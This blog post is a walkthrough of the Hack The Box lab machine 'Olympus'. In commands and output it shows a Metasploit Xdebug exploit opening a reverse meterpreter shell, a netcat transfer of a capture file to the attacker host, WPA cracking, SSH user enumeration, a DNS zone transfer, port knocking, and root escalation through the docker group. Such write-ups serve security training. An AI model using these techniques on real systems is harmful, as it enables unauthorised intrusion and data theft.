5 December 2022

Pentesting Fun Stuff

following the cyber security path…

Olympus

Starting with a port scan.

root@n0w4n:~# nmap -v -n -T4 -sS -sV -sC -oN ~/htb/olympus/scan.nmap -p- 10.10.10.83
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-04 19:06 CET
Nmap scan report for 10.10.10.83
Host is up (0.033s latency).
Not shown: 65531 closed ports
PORT     STATE    SERVICE VERSION
22/tcp   filtered ssh
53/tcp   open     domain  (unknown banner: Bind)
| dns-nsid:
|_  bind.version: Bind
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|     bind
|_    Bind
80/tcp   open     http    Apache httpd
|_http-favicon: Unknown favicon MD5: 399EAE2564C19BD20E855CDB3C0C9D1B
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache
|_http-title: Crete island - Olympus HTB
2222/tcp open     ssh     (protocol 2.0)
| fingerprint-strings:
|   NULL:
|_    SSH-2.0-City of olympia
| ssh-hostkey:
|   2048 f2:ba:db:06:95:00:ec:05:81:b0:93:60:32:fd:9e:00 (RSA)
|   256 79:90:c0:3d:43:6c:8d:72:19:60:45:3c:f8:99:14:bb (ECDSA)
|_  256 f8:5b:2e:32:95:03:12:a3:3b:40:c5:11:27:ca:71:52 (ED25519)
NSE: Script Post-scanning.
Initiating NSE at 19:07
Completed NSE at 19:07, 0.00s elapsed
Initiating NSE at 19:07
Completed NSE at 19:07, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.53 seconds
           Raw packets sent: 66614 (2.931MB) | Rcvd: 65711 (2.628MB)

So SSH port 22 is filtered, which overall means the packet is dropped (by a firewall).
There is an open port 2222 which runs a SSH server behind it.
There is also a webserver running on port 80 and finally a DNS server runs behind port 53.
With these results there are a few things off.
First port 22 which I already mentioned.
Also DNS is mostly UDP and if TCP port 53 is open for DNS it’s mostly for domain transfers (link)
On port 80 an Apache webserver is running, but unfortunately it doesn’t leak a version number.
There are a few DNS recon tools, but Kali has by default dnsrecon installed which can do a scan of a nameserver and try and find any subdomain registered.
It can take a while, so I’ll run it in the back with a for loop.

root@n0w4n:~/htb/olympus# for DOMAIN in 10.0.0.0/8 172.16.0.0/16 192.168.0.0/24; do dnsrecon -n 10.10.10.83 -r $DOMAIN --db dns_database; done

On the website there is not that much. Just a picture.

root@n0w4n:~/htb/olympus# curl -v 10.10.10.83
*   Trying 10.10.10.83...
* TCP_NODELAY set
* Connected to 10.10.10.83 (10.10.10.83) port 80 (#0)
> GET / HTTP/1.1
> Host: 10.10.10.83
> User-Agent: curl/7.62.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Tue, 04 Dec 2018 19:12:46 GMT
< Server: Apache
< Vary: Accept-Encoding
< X-Content-Type-Options: nosniff
< X-Frame-Options: sameorigin
< X-XSS-Protection: 1; mode=block
< Xdebug: 2.5.5
< Content-Length: 314
< Content-Type: text/html; charset=UTF-8
<
	<!DOCTYPE HTML>
		<html>
		<head>
			<title>Crete island - Olympus HTB</title>
			<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
			<link rel="shortcut icon" href="favicon.ico">
			<link rel="stylesheet" type="text/css" href="crete.css">
		</head>
		<body class="crete">
		</body>
* Connection #0 to host 10.10.10.83 left intact
root@n0w4n:~/htb/olympus# wget 10.10.10.83/zeus.jpg
--2018-12-04 20:11:29--  http://10.10.10.83/zeus.jpg
Connecting to 10.10.10.83:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 37144 (36K) [image/jpeg]
Saving to: ‘zeus.jpg’
zeus.jpg                                             100%[====================================================================================================================>]  36.27K  --.-KB/s    in 0.07s
2018-12-04 20:11:30 (540 KB/s) - ‘zeus.jpg’ saved [37144/37144]

When I check it with exiftool and hexdump there is nothing odd about it. Why did I download the image?
In some CTF’s there are comments placed in the meta-data of an image or the image is used for steganography.
No comments here, so I’ll hang on to it if there is a hint about steganography or something.
In the curl output there is another thing that stands out: Xdebug: 2.5.5
After some googling it looks like Xdebug is an extension for PHP to assist with debugging and development. It contains a single step debugger to use with IDEs (link).
Another hit that came up was for the use of a metasploit module.

msf > use exploit/unix/http/xdebug_unauth_exec
msf exploit(unix/http/xdebug_unauth_exec) > options
Module options (exploit/unix/http/xdebug_unauth_exec):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   PATH     /index.php       yes       Path to target webapp
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                     yes       The target address
   RPORT    80               yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       Callback host for accepting connections
   SRVPORT  9000             yes       Port to listen for the debugger
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Automatic
msf exploit(unix/http/xdebug_unauth_exec) > set rhost 10.10.10.83
rhost => 10.10.10.83
msf exploit(unix/http/xdebug_unauth_exec) > set lhost tun0
lhost => tun0
msf exploit(unix/http/xdebug_unauth_exec) > exploit
[*] Started reverse TCP handler on 10.10.14.8:4444
[*] 10.10.10.83:80 - Waiting for client response.
[*] 10.10.10.83:80 - Receiving response
[*] 10.10.10.83:80 - Shell might take upto a minute to respond.Please be patient.
[*] 10.10.10.83:80 - Sending payload of size 2026 bytes
[*] Sending stage (38247 bytes) to 10.10.10.83
[*] Meterpreter session 1 opened (10.10.14.8:4444 -> 10.10.10.83:51148) at 2018-12-04 20:25:05 +0100
id
meterpreter >
meterpreter > sysinfo
Computer    : f00ba96171c5
OS          : Linux f00ba96171c5 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02) x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data (33)

I’ll jump onto the machine.

cd /
ls -lah
total 72K
drwxr-xr-x   1 root root 4.0K Apr  8  2018 .
drwxr-xr-x   1 root root 4.0K Apr  8  2018 ..
-rwxr-xr-x   1 root root    0 Apr  8  2018 .dockerenv
drwxr-xr-x   1 root root 4.0K Apr  8  2018 bin
drwxr-xr-x   2 root root 4.0K Jul 13  2017 boot
drwxr-xr-x   5 root root  340 Dec  3 05:13 dev
drwxr-xr-x   1 root root 4.0K Apr  8  2018 etc
drwxr-xr-x   1 root root 4.0K Apr  8  2018 home
drwxr-xr-x   1 root root 4.0K Apr  8  2018 lib
drwxr-xr-x   2 root root 4.0K Oct  9  2017 lib64
drwxr-xr-x   2 root root 4.0K Oct  9  2017 media
drwxr-xr-x   2 root root 4.0K Oct  9  2017 mnt
drwxr-xr-x   2 root root 4.0K Oct  9  2017 opt
dr-xr-xr-x 164 root root    0 Dec  3 05:13 proc
drwx------   1 root root 4.0K Apr 15  2018 root
drwxr-xr-x   1 root root 4.0K Dec  1  2017 run
drwxr-xr-x   1 root root 4.0K Apr  8  2018 sbin
drwxr-xr-x   2 root root 4.0K Oct  9  2017 srv
dr-xr-xr-x  13 root root    0 Dec  3 05:13 sys
drwxrwxrwt   1 root root 4.0K Apr  8  2018 tmp
drwxr-xr-x   1 root root 4.0K Oct  9  2017 usr
drwxr-xr-x   1 root root 4.0K Dec  1  2017 var
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
7: eth0@if8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:ac:14:00:02 brd ff:ff:ff:ff:ff:ff
    inet 172.20.0.2/16 brd 172.20.255.255 scope global eth0
       valid_lft forever preferred_lft forever

It looks like I’m in a docker environment.

ls -lah /home
total 12K
drwxr-xr-x 1 root root 4.0K Apr  8  2018 .
drwxr-xr-x 1 root root 4.0K Apr  8  2018 ..
drwxr-xr-x 1 zeus zeus 4.0K Apr  8  2018 zeus
ls -lah /home/zeus
total 12K
drwxr-xr-x 1 zeus zeus 4.0K Apr  8  2018 .
drwxr-xr-x 1 root root 4.0K Apr  8  2018 ..
drwxr-xr-x 1 zeus zeus 4.0K Apr  8  2018 airgeddon
ls -lah /home/zeus/airgeddon
total 1.1M
drwxr-xr-x 1 zeus zeus 4.0K Apr  8  2018 .
drwxr-xr-x 1 zeus zeus 4.0K Apr  8  2018 ..
-rw-r--r-- 1 zeus zeus  264 Apr  8  2018 .editorconfig
drwxr-xr-x 1 zeus zeus 4.0K Apr  8  2018 .git
-rw-r--r-- 1 zeus zeus  230 Apr  8  2018 .gitattributes
drwxr-xr-x 1 zeus zeus 4.0K Apr  8  2018 .github
-rw-r--r-- 1 zeus zeus   89 Apr  8  2018 .gitignore
-rw-r--r-- 1 zeus zeus  16K Apr  8  2018 CHANGELOG.md
-rw-r--r-- 1 zeus zeus 3.2K Apr  8  2018 CODE_OF_CONDUCT.md
-rw-r--r-- 1 zeus zeus 6.3K Apr  8  2018 CONTRIBUTING.md
-rw-r--r-- 1 zeus zeus 3.3K Apr  8  2018 Dockerfile
-rw-r--r-- 1 zeus zeus  35K Apr  8  2018 LICENSE.md
-rw-r--r-- 1 zeus zeus 4.4K Apr  8  2018 README.md
-rw-r--r-- 1 zeus zeus 291K Apr  8  2018 airgeddon.sh
drwxr-xr-x 1 zeus zeus 4.0K Apr  8  2018 binaries
drwxr-xr-x 1 zeus zeus 4.0K Apr  8  2018 captured
drwxr-xr-x 1 zeus zeus 4.0K Apr  8  2018 imgs
-rw-r--r-- 1 zeus zeus  16K Apr  8  2018 known_pins.db
-rw-r--r-- 1 zeus zeus 670K Apr  8  2018 language_strings.sh
-rw-r--r-- 1 zeus zeus   33 Apr  8  2018 pindb_checksum.txt
cd /home/zeus/airgeddon/captured
ls -lah
total 304K
drwxr-xr-x 1 zeus zeus 4.0K Apr  8  2018 .
drwxr-xr-x 1 zeus zeus 4.0K Apr  8  2018 ..
-rw-r--r-- 1 zeus zeus 291K Apr  8  2018 captured.cap
-rw-r--r-- 1 zeus zeus   57 Apr  8  2018 papyrus.txt
cat papyrus.txt
Captured while flying. I'll banish him to Olympia - Zeus

Let’s get the file over to my local machine

root@n0w4n:~/htb/olympus# nc -lp 9999 > captured.cap
nc -w3 10.10.14.8 9999 < captured.cap

And it’s send.

root@n0w4n:~/htb/olympus# file captured.cap
captured.cap: tcpdump capture file (little-endian) - version 2.4 (802.11, capture length 65535)

Opening the file with wireshark

SSID…..looks like WiFi.
Let’s check the wireless LAN option.


CCMP……looks like it is a WPA key.
A good way to crack a WPA key is with hashcat. Unfortunately I run Kali in a VM and it doesn’t like hashcat very much.
That’s why I use a somewhat older method with aircrack-ng.

root@n0w4n:~/htb/olympus# aircrack-ng -w /usr/share/wordlists/rockyou.txt captured.cap
      [00:22:04] 5306000/9822768 keys tested (4211.03 k/s)
      Time left: 17 minutes, 52 seconds                         54.02%
                        KEY FOUND! [ flightoficarus ]
      Master Key     : FA C9 FB 75 B7 7E DC 86 CC C0 D5 38 88 75 B8 5A
                       88 3B 75 31 D9 C3 23 C8 68 3C DB FA 0F 67 3F 48
      Transient Key  : 20 05 27 E1 73 E0 73 F5 F1 2D AF D1 17 8B F8 27
                       C6 BE 23 E3 70 8A EF AE 6D 0C 89 00 00 00 00 00
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      EAPOL HMAC     : AC 1A 73 84 FB BF 75 9C 86 CF 5B 5A F4 8A 4C 38

For this brute-force attempt I use the favorite CTF wordlist……rockyou.txt
Another method is to use john the ripper, but then you need to convert the cap file into a hccap file and then in a file which John can digest (can be done with hccap2john).
As I now have the WPA key I can decrypt the traffic.
The capture file has over 6000 packets, so to filter there are some things that can be done.
First there is the statistics option with protocol hierarchy. With this you can see all the used protocols and get a overview on what to target on.
Also I can use a display filter to filter out unwanted packets. In this case I use the ‘ip’ filter so I can see all the ip traffic and nothing else.
Unfortunately I can’t find anything useful in this capture file other then the cracked password. The password on itself may be the final objective for this capture file.
So a password reuse maybe?

ss -tupan
Netid  State      Recv-Q Send-Q     Local Address:Port       Peer Address:Port
udp    UNCONN     0      0             127.0.0.11:57019                 *:*
tcp    LISTEN     0      128                    *:80                    *:*
tcp    LISTEN     0      128           127.0.0.11:43929                 *:*
tcp    CLOSE-WAIT 0      0             172.20.0.2:51942        10.10.14.8:9000   users:(("ss",pid=27,fd=13),("sh",pid=22,fd=13),("sh",pid=21,fd=13))
tcp    ESTAB      0      432           172.20.0.2:39186        10.10.14.8:5555   users:(("ss",pid=27,fd=14),("sh",pid=22,fd=14),("sh",pid=21,fd=14))

Nothing interesting is listening on this machine. So I go back to my local machine and try SSH on port 2222 with found username zeus and password flightoficarus

root@n0w4n:~/htb/olympus# ssh zeus@10.10.10.83 -p 2222
zeus@10.10.10.83's password:
Permission denied, please try again.

Not working. Maybe not the right username or password. Metasploit has a ssh enumeration module.
For this to work I need a list of usernames and because this machine has a clear theme.
I found a site with a nice list of the gods, but it’s not a straight list to download. Normally you can use a tool called CeWL to generate wordlists form websites. But because there is so much text on this site, it’s better to do it manually.
For this I found a website with a lot of names and copied the content into a file. Then I trim the file a bit to be of better use to metasploit.

root@n0w4n:~/htb/olympus# cat gods.list | awk '{print $1}' | tr '[:upper:]' '[:lower:]' > list.gods

As check I also put in root as user, because in most cases root is a valid username.

msf auxiliary(scanner/ssh/ssh_enumusers) > options
Module options (auxiliary/scanner/ssh/ssh_enumusers):
   Name         Current Setting          Required  Description
   ----         ---------------          --------  -----------
   CHECK_FALSE  false                    no        Check for false positives (random username)
   Proxies                               no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS       10.10.10.83              yes       The target address range or CIDR identifier
   RPORT        2222                     yes       The target port
   THREADS      1                        yes       The number of concurrent threads
   THRESHOLD    10                       yes       Amount of seconds needed before a user is considered found (timing attack only)
   USERNAME                              no        Single username to test (username spray)
   USER_FILE    ~/htb/olympus/list.gods  no        File containing usernames, one per line
Auxiliary action:
   Name              Description
   ----              -----------
   Malformed Packet  Use a malformed packet
msf auxiliary(scanner/ssh/ssh_enumusers) > run
[*] 10.10.10.83:2222 - SSH - Using malformed packet technique
[*] 10.10.10.83:2222 - SSH - Starting scan
[+] 10.10.10.83:2222 - SSH - User 'root' found
[-] 10.10.10.83:2222 - SSH - User 'acestes' not found
..... {SNIPPED] .....
[-] 10.10.10.83:2222 - SSH - User 'iasion' not found
[+] 10.10.10.83:2222 - SSH - User 'icarus' found
[-] 10.10.10.83:2222 - SSH - User 'idomeneus' not found
..... [SNIPPED] .....
[-] 10.10.10.83:2222 - SSH - User 'zeus' not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

So there is a username other then root: icarus
That makes sense as the SSID was Too_cl0se_to_th3_Sun.

root@n0w4n:~/htb/olympus# ssh icarus@10.10.10.83 -p 2222
icarus@10.10.10.83's password:
Permission denied, please try again.

“flightoficarus” is not working? After some pondering I tried the SSID (because it was leet) and that worked as a password.

root@n0w4n:~/htb/olympus# ssh icarus@10.10.10.83 -p 2222
icarus@10.10.10.83's password:
Last login: Sun Apr 15 16:44:40 2018 from 10.10.14.4
icarus@620b296204a3:~$
icarus@620b296204a3:~$ ls -lah
total 32K
drwxr-xr-x 1 icarus icarus 4.0K Apr 15  2018 .
drwxr-xr-x 1 root   root   4.0K Apr  8  2018 ..
-rw------- 1 icarus icarus   33 Apr 15  2018 .bash_history
-rw-r--r-- 1 icarus icarus  220 Aug 31  2015 .bash_logout
-rw-r--r-- 1 icarus icarus 3.7K Aug 31  2015 .bashrc
drwx------ 2 icarus icarus 4.0K Apr 15  2018 .cache
-rw-r--r-- 1 icarus icarus  655 May 16  2017 .profile
-rw-r--r-- 1 root   root     85 Apr 15  2018 help_of_the_gods.txt
icarus@620b296204a3:~$ cat help_of_the_gods.txt
Athena goddess will guide you through the dark...
Way to Rhodes...
ctfolympus.htb

Still no user.txt
I guess I’m still not the user intended to find the first hash.
I got a hostname and the mentioning of Athena as goddess. But this username was already in my list….so that’s not a username for this box.

icarus@620b296204a3:~$ ls -lah /
total 72K
drwxr-xr-x   1 root root 4.0K Apr  8  2018 .
drwxr-xr-x   1 root root 4.0K Apr  8  2018 ..
-rwxr-xr-x   1 root root    0 Apr  8  2018 .dockerenv
drwxr-xr-x   2 root root 4.0K Feb 28  2018 bin
drwxr-xr-x   2 root root 4.0K Apr 12  2016 boot
drwxr-xr-x   5 root root  340 Dec  4 19:51 dev
drwxr-xr-x   1 root root 4.0K Apr  8  2018 etc
drwxr-xr-x   1 root root 4.0K Apr  8  2018 home
drwxr-xr-x   1 root root 4.0K Sep 13  2015 lib
drwxr-xr-x   2 root root 4.0K Feb 28  2018 lib64
drwxr-xr-x   2 root root 4.0K Feb 28  2018 media
drwxr-xr-x   2 root root 4.0K Feb 28  2018 mnt
drwxr-xr-x   2 root root 4.0K Feb 28  2018 opt
dr-xr-xr-x 160 root root    0 Dec  4 19:51 proc
drwx------   1 root root 4.0K Apr 15  2018 root
drwxr-xr-x   1 root root 4.0K Dec  5 08:08 run
drwxr-xr-x   1 root root 4.0K Mar  6  2018 sbin
drwxr-xr-x   2 root root 4.0K Feb 28  2018 srv
dr-xr-xr-x  13 root root    0 Dec  4 19:51 sys
drwxrwxrwt   1 root root 4.0K Apr  3  2018 tmp
drwxr-xr-x   1 root root 4.0K Feb 28  2018 usr
drwxr-xr-x   1 root root 4.0K Feb 28  2018 var

I’m in another docker.
When I try to enumerate this machine I notice there are almost no tools installed.
From the initial nmap scan I know that there is a nameserver running. But than I had no domain name.
Let’s try a domain transfer with dig.

root@n0w4n:~/htb/olympus# dig @10.10.10.83 ctfolympus.htb -t AXFR
; <<>> DiG 9.11.5-1-Debian <<>> @10.10.10.83 ctfolympus.htb -t AXFR
; (1 server found)
;; global options: +cmd
ctfolympus.htb.		86400	IN	SOA	ns1.ctfolympus.htb. ns2.ctfolympus.htb. 2018042301 21600 3600 604800 86400
ctfolympus.htb.		86400	IN	TXT	"prometheus, open a temporal portal to Hades (3456 8234 62431) and St34l_th3_F1re!"
ctfolympus.htb.		86400	IN	A	192.168.0.120
ctfolympus.htb.		86400	IN	NS	ns1.ctfolympus.htb.
ctfolympus.htb.		86400	IN	NS	ns2.ctfolympus.htb.
ctfolympus.htb.		86400	IN	MX	10 mail.ctfolympus.htb.
crete.ctfolympus.htb.	86400	IN	CNAME	ctfolympus.htb.
hades.ctfolympus.htb.	86400	IN	CNAME	ctfolympus.htb.
mail.ctfolympus.htb.	86400	IN	A	192.168.0.120
ns1.ctfolympus.htb.	86400	IN	A	192.168.0.120
ns2.ctfolympus.htb.	86400	IN	A	192.168.0.120
rhodes.ctfolympus.htb.	86400	IN	CNAME	ctfolympus.htb.
RhodesColossus.ctfolympus.htb. 86400 IN	TXT	"Here lies the great Colossus of Rhodes"
www.ctfolympus.htb.	86400	IN	CNAME	ctfolympus.htb.
ctfolympus.htb.		86400	IN	SOA	ns1.ctfolympus.htb. ns2.ctfolympus.htb. 2018042301 21600 3600 604800 86400
;; Query time: 30 msec
;; SERVER: 10.10.10.83#53(10.10.10.83)
;; WHEN: Wed Dec 05 09:24:01 CET 2018
;; XFR size: 15 records (messages 1, bytes 475)

Some comments:
“prometheus, open a temporal portal to Hades (3456 8234 62431) and St34l_th3_F1re!”
RhodesColossus.ctfolympus.htb. 86400 IN TXT “Here lies the great Colossus of Rhodes”
The first one has again a string with leet, which looks like a password and 3 numbers.
The three numbers and the reference to temporal has port knocking written all over it.
There are several ways to knock on a port. You can use nmap, telnet, netcat or as I’m doing…..use knock (you need knockd installed for this).

root@n0w4n:~/htb/olympus# knock 10.10.10.83 3456 8234 62431
root@n0w4n:~/htb/olympus# nmap -n -T4 -p- 10.10.10.83
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-05 09:43 CET
Nmap scan report for 10.10.10.83
Host is up (0.033s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
80/tcp   open  http
2222/tcp open  EtherNetIP-1
Nmap done: 1 IP address (1 host up) scanned in 40.38 seconds

Another port scan reveals port 22 to be open.

root@n0w4n:~/htb/olympus# ssh prometheus@10.10.10.83
The authenticity of host '10.10.10.83 (10.10.10.83)' can't be established.
ECDSA key fingerprint is SHA256:8TR2+AWSBT/c5mrjpDotoEYu0mEy/jCzpuS79d+Z0oY.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.10.83' (ECDSA) to the list of known hosts.
prometheus@10.10.10.83's password:
Welcome to
    )         (
 ( /(     )   )\ )   (
 )\()) ( /(  (()/(  ))\ (
((_)\  )(_))  ((_))/((_))\
| |(_)((_)_   _| |(_)) ((_)
| ' \ / _` |/ _` |/ -_)(_-<
|_||_|\__,_|\__,_|\___|/__/
prometheus@olympus:~$
prometheus@olympus:~$ ls -lah ~
total 28K
drwxr-xr-x 2 prometheus prometheus 4.0K Apr  8  2018 .
drwxr-xr-x 3 root       root       4.0K Apr  4  2018 ..
-rw------- 1 root       root          0 Apr  8  2018 .bash_history
-rw-r--r-- 1 prometheus prometheus  220 Apr  2  2018 .bash_logout
-rw-r--r-- 1 prometheus prometheus 3.6K Apr  4  2018 .bashrc
-rw-r----- 1 root       prometheus  248 Apr  8  2018 msg_of_gods.txt
-rw-r--r-- 1 prometheus prometheus  675 Apr  2  2018 .profile
-rw-r----- 1 root       prometheus   33 Apr  4  2018 user.txt
prometheus@olympus:~$ cat ~/user.txt
[no spoilers]

Finally………the first flag.
Now on to getting root.

prometheus@olympus:~$ ip a | grep inet
    inet 127.0.0.1/8 scope host lo
    inet 10.10.10.83/24 brd 10.10.10.255 scope global enp0s3
    inet 172.19.0.1/16 brd 172.19.255.255 scope global br-0a8ad598ebee
    inet 172.18.0.1/16 brd 172.18.255.255 scope global br-2668d8e07649
    inet 172.20.0.1/16 brd 172.20.255.255 scope global br-c8834ba5f981
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
prometheus@olympus:~$ ls -lah /
total 84K
drwxr-xr-x  22 root root 4.0K Apr  2  2018 .
drwxr-xr-x  22 root root 4.0K Apr  2  2018 ..
drwxr-xr-x   2 root root 4.0K Apr 15  2018 bin
drwxr-xr-x   3 root root 4.0K Apr 15  2018 boot
drwxr-xr-x  17 root root 3.1K Dec  4 12:50 dev
drwxr-xr-x  85 root root 4.0K Apr 15  2018 etc
drwxr-xr-x   3 root root 4.0K Apr  4  2018 home
lrwxrwxrwx   1 root root   29 Apr  2  2018 initrd.img -> boot/initrd.img-4.9.0-6-amd64
lrwxrwxrwx   1 root root   29 Apr  2  2018 initrd.img.old -> boot/initrd.img-4.9.0-4-amd64
drwxr-xr-x  16 root root 4.0K Apr  2  2018 lib
drwxr-xr-x   2 root root 4.0K Apr  2  2018 lib64
drwx------   2 root root  16K Apr  2  2018 lost+found
drwxr-xr-x   3 root root 4.0K Apr  2  2018 media
drwxr-xr-x   2 root root 4.0K Apr  2  2018 mnt
drwxr-xr-x   2 root root 4.0K Apr  2  2018 opt
dr-xr-xr-x 167 root root    0 Dec  4 12:50 proc
drwx------   4 root root 4.0K Apr 15  2018 root
drwxr-xr-x  17 root root  600 Dec  5 01:28 run
drwxr-xr-x   2 root root 4.0K Apr 15  2018 sbin
drwxr-xr-x   2 root root 4.0K Apr  2  2018 srv
dr-xr-xr-x  13 root root    0 Dec  5 01:13 sys
drwxrwxrwt   9 root root 4.0K Dec  5 01:38 tmp
drwxr-xr-x  10 root root 4.0K Apr  2  2018 usr
drwxr-xr-x  11 root root 4.0K Apr  2  2018 var
lrwxrwxrwx   1 root root   26 Apr  2  2018 vmlinuz -> boot/vmlinuz-4.9.0-6-amd64
lrwxrwxrwx   1 root root   26 Apr  2  2018 vmlinuz.old -> boot/vmlinuz-4.9.0-4-amd64

I’m not in a docker anymore.

prometheus@olympus:~$ id
uid=1000(prometheus) gid=1000(prometheus) groups=1000(prometheus),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),111(bluetooth),999(docker)

Looks like I don’t have SUDO, but I do have access to the docker group which give the opportunity to elevate your rights as being a member of the docker group is the same as giving a user full root access to the system (link).
The way I’m going to get root is to mount the root folder to a bind docker. The steps and explanation can be found here.
Docker has a very useful menu function whereas you just have to give an argument (command) and with –help you get another list of possibilities.

prometheus@olympus:~$ docker container ls
CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS              PORTS                                    NAMES
f00ba96171c5        crete               "docker-php-entrypoi…"   8 months ago        Up 13 hours         0.0.0.0:80->80/tcp                       crete
ce2ecb56a96e        rodhes              "/etc/bind/entrypoin…"   8 months ago        Up 13 hours         0.0.0.0:53->53/tcp, 0.0.0.0:53->53/udp   rhodes
620b296204a3        olympia             "/usr/sbin/sshd -D"      8 months ago        Up 13 hours         0.0.0.0:2222->22/tcp                     olympia
prometheus@olympus:~$ docker run -v /root:/tmp/n0w4n -ti rodhes bash
cat: /etc/hostip: No such file or directory
root@09c736226d89:/#

With docker -v I binded /root to /tmp/n0w4n

root@09c736226d89:/# cd /tmp/n0w4n/
root@09c736226d89:/tmp/n0w4n# ls -lah
total 28K
drwx------ 4 root root 4.0K Apr 15  2018 .
drwxrwxrwt 1 root root 4.0K Dec  5 09:05 ..
-rw------- 1 root root    0 Apr 15  2018 .bash_history
-rw-r--r-- 1 root root  570 Jan 31  2010 .bashrc
drwx------ 2 root root 4.0K Apr  2  2018 .cache
drwxr-xr-x 2 root root 4.0K Apr 15  2018 .nano
-rw-r--r-- 1 root root  148 Aug 17  2015 .profile
-r-------- 1 root root   33 Apr  4  2018 root.txt
root@09c736226d89:/tmp/n0w4n# cat root.txt
[no spoilers]

On entering that container /root was mounted in /tmp/n0w4n
And there is the final flag.
 
Normally I don’t really like CTF minded machines on HTB, but this one was really fun to do.
 

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.